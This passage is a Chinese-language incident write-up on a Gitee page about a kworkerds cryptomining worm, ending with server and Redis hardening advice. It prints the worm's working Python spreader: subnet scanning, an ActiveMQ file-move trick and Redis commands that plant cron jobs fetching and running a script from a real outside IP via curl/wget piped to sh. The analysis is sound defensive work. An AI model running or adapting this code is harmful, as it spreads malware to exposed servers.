                  headers = {'Destination': 'file:///etc/cron.d/root'}
                  headers2 = {'Destination': 'file:///var/spool/cron/root'}
                  headers3 = {'Destination': 'file:///var/spool/cron/crontabs/root'}
                  conn = httplib.HTTPConnection(self.host, port=8161, timeout=2)
                  conn.request(method='MOVE', url='/fileserver/go.txt', headers=headers)
                  conn.request(method='MOVE', url='/fileserver/goa.txt', headers=headers2)
                  conn.request(method='MOVE', url='/fileserver/gob.txt', headers=headers3)
                  conn.close()
          s.close()
      except Exception:
          pass
      try:
          s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s2.settimeout(2)
          x = s2.connect_ex((self.host, 6379))
          if x == 0:
              s2.send('config set stop-writes-on-bgsave-error no\r\n')
              s2.send('flushall\r\n')
              s2.send('config set dbfilename root\r\n')
              s2.send('set SwE3SC "\\t\\n*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n')
              s2.send('set NysX7D "\\t\\n*/15 * * * * (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n')
              s2.send('config set dir /etc/cron.d\r\n')
              s2.send('save\r\n')
              s2.send('config set dir /var/spool/cron\r\n')
              s2.send('save\r\n')
              s2.send('config set dir /var/spool/cron/crontabs\r\n')
              s2.send('save\r\n')
              s2.send('flushall\r\n')
              s2.send('config set stop-writes-on-bgsave-error yes\r\n')
          s2.close()
      except Exception:
          pass
      scanner.lck.acquire()
      scanner.tlist.remove(self)
      if len(scanner.tlist) < scanner.maxthreads:
          scanner.evnt.set()
          scanner.evnt.clear()
      scanner.lck.release()

  def newthread(host):
      scanner.lck.acquire()
      sc = scanner(host)
      scanner.tlist.append(sc)
      scanner.lck.release()
      sc.start()

  newthread = staticmethod(newthread)

def get_ip_list():
  try:
      url = 'ident.me'
      conn = httplib.HTTPConnection(url, port=80, timeout=10)
      conn.request(method='GET', url='/', )
      result = conn.getresponse()
      ip1 = result.read()
      ips1 = findall(r'\d+.\d+.', ip1)[0]
      for u in range(0, 256):
          ip_list1 = (ips1 + (str(u)))
          for g in range(1, 256):
              IP_LIST.append(ip_list1 + '.' + (str(g)))
  except Exception:
      ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()
      ips2 = findall(r'\d+.\d+.', ip2)[0]
      for i in range(0, 255):
          ip_list2 = (ips2 + (str(i)))
          for g in range(1, 255):
              IP_LIST.append(ip_list2 + '.' + (str(g)))
      pass

def runPortscan():
  get_ip_list()
  for host in IP_LIST:
      scanner.lck.acquire()
      if len(scanner.tlist) >= scanner.maxthreads:
          scanner.lck.release()
          scanner.evnt.wait()
      else:
          scanner.lck.release()
      scanner.newthread(host)
  for t in scanner.tlist:
      t.join()

if __name__ == "__main__":
  runPortscan()

0x03 总结

一开始的修改系统环境没什么好说的,接下来的写文件操作有点眼熟,如果用过redis的人,应该能猜到,这里是对redis进行配置。写这个配置,自然也就是利用了redis把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的/root/.ssh/authorized_keys。登录之后就开始定期执行计划任务,下载脚本。好了,配置文件准备好了,就开始利用masscan进行全网扫描redis服务器,寻找肉鸡,注意看这6379就是redis服务器的默认端口,如果你的redis的监听端口是公网IP或是0.0.0.0,并且没有密码保护,不好意思,你就中招了。

通过依次分析这3个脚本,就能看出这个病毒的可怕之处,先是通过写入ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过redis漏洞复制,迅速在全网传播,以指数级速度增长。那么问题是,这台服务器是怎么中招的呢?看了下redis.conf,bind的地址是127.0.0.1,没啥问题。由此可以推断,应该是root帐号被暴力破解了,为了验证我的想法,我lastb看了一下,果然有大量的记录: 图4 还剩最后一个问题,这个gpg-agentd程序到底是干什么的呢?我当时的第一个反应就是矿机,因为现在数字货币太火了,加大了分布式矿机的需求,也就催生了这条灰色产业链。于是,顺手把这个gpg-agentd拖到ida中,用string搜索bitcoin, eth, mine等相关单词,最终发现了这个:

0x04 安全建议

一,服务器

1,禁用ROOT 2,用户名和密码尽量复杂 3,修改ssh的默认22端口 4,安装DenyHosts防暴力破解软件 5,禁用密码登录,使用RSA公钥登录

二,redis

1,禁用公网IP监听,包括0.0.0.0 2,使用密码限制访问redis 3,使用较低权限帐号运行redis

空文件

简介

记录一次kworkerds挖矿入侵 展开 收起
取消

发行版

暂无发行版

贡献者

全部

近期动态

加载更多
不能加载更多了
1
https://gitee.com/reggiepy/JiLuYiCikworkerdsWaKuangRuQin.git
git@gitee.com:reggiepy/JiLuYiCikworkerdsWaKuangRuQin.git
reggiepy
JiLuYiCikworkerdsWaKuangRuQin
记录一次kworkerds挖矿入侵
master

搜索帮助